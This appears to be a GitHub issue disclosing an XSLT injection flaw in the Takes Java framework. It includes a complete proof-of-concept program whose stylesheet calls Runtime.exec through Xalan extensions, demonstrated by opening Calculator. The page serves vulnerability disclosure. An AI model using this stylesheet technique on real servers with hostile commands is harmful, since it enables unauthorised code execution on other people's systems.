You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The Takes framework is vulnerable to XSLT injection due to the lack of secure parameters in XSLT transformation function that comes with the Takes framework.
Below is an example code snippet and its effect.
package org.example;
import org.apache.commons.io.IOUtils;
import org.cactoos.Text;
import org.cactoos.io.InputStreamOf;
import org.cactoos.text.Joined;
import org.takes.rs.RsText;
import org.takes.rs.RsXslt;
import javax.xml.transform.stream.StreamSource;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
public class SimpleTakesApp {
public static void main(String[] args) throws IOException {
final Text xml = new Joined(
" ",
"<?xml-stylesheet href='/a.xsl' type='text/xsl'?>",
"<page><data>ура</data></page>"
);
final Text xsl = new Joined(
" ",
"<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" xmlns:rt=\"http://xml.apache.org/xalan/java/java.lang.Runtime\" xmlns:ob=\"http://xml.apache.org/xalan/java/java.lang.Object\">\n" +
" <xsl:template match=\"/\">\n" +
" <xsl:variable name=\"rtobject\" select=\"rt:getRuntime()\"/>\n" +
" <xsl:variable name=\"process\" select=\"rt:exec($rtobject,'open -a Calculator')\"/>\n" +
" <xsl:variable name=\"processString\" select=\"ob:toString($process)\"/>\n" +
" <xsl:value-of select=\"$processString\"/>\n" +
" </xsl:template>\n" +
" </xsl:stylesheet>"
);
String transformedValue = IOUtils.toString(
new RsXslt(
new RsText(new InputStreamOf(xml)),
(href, base) -> new StreamSource(new InputStreamOf(xsl))
).body(),
StandardCharsets.UTF_8
);
System.out.println(transformedValue);
}
}
The text was updated successfully, but these errors were encountered:
The Takes framework is vulnerable to XSLT injection due to the lack of secure parameters in XSLT transformation function that comes with the Takes framework.
Below is an example code snippet and its effect.
The text was updated successfully, but these errors were encountered: